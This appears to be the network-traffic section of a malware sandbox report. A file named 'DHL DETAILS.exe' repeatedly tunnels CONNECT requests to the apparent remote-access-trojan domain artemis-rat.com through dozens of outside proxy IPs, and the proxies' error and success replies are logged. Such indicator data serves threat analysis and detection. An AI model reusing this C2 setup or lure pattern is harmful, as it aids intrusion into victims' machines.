                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1408192.168.2.552872191.97.3.2109996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.846935987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1409192.168.2.554173104.21.218.103806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.847017050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.001069069 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1410192.168.2.55406543.133.136.20888006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.848982096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1411192.168.2.554124201.144.20.23156786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.848984003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1412192.168.2.55408043.128.146.42156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.849133015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1413192.168.2.55408981.169.187.194806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.849190950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.167665005 CET474INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: Apache
                                                                                    Allow: GET,POST,OPTIONS,HEAD
                                                                                    Content-Length: 290
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1414192.168.2.554210172.67.181.144806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.859273911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.013581991 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1415192.168.2.55283169.61.200.104361816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.860683918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1416192.168.2.553885123.241.210.123806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.870759010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1417192.168.2.554250162.159.241.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.903237104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.064553022 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1418192.168.2.55420038.162.3.5031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.904503107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.696713924 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1419192.168.2.554280104.25.87.42806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.910828114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.065340042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1420192.168.2.554284104.16.195.74806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.913824081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.068159103 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1421192.168.2.554264184.72.36.89806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.920121908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.091964960 CET344INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 199
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1422192.168.2.554301188.114.99.171806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.921140909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.075274944 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1423192.168.2.55363861.19.145.6680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.927602053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.707946062 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1424192.168.2.554313172.67.219.60806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.927894115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.083442926 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1425192.168.2.554266192.163.202.88397826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.928273916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536442041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224488020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.333532095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1426192.168.2.55413847.243.114.19281806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.930864096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1427192.168.2.554248162.120.71.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.970096111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.727078915 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1428192.168.2.553550115.245.86.3731296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.970299006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1429192.168.2.554365192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.973325014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1430192.168.2.55411582.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.973335028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1431192.168.2.55351541.65.227.10519766352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.974620104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1432192.168.2.55414320.24.43.21481236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.974828005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.311894894 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
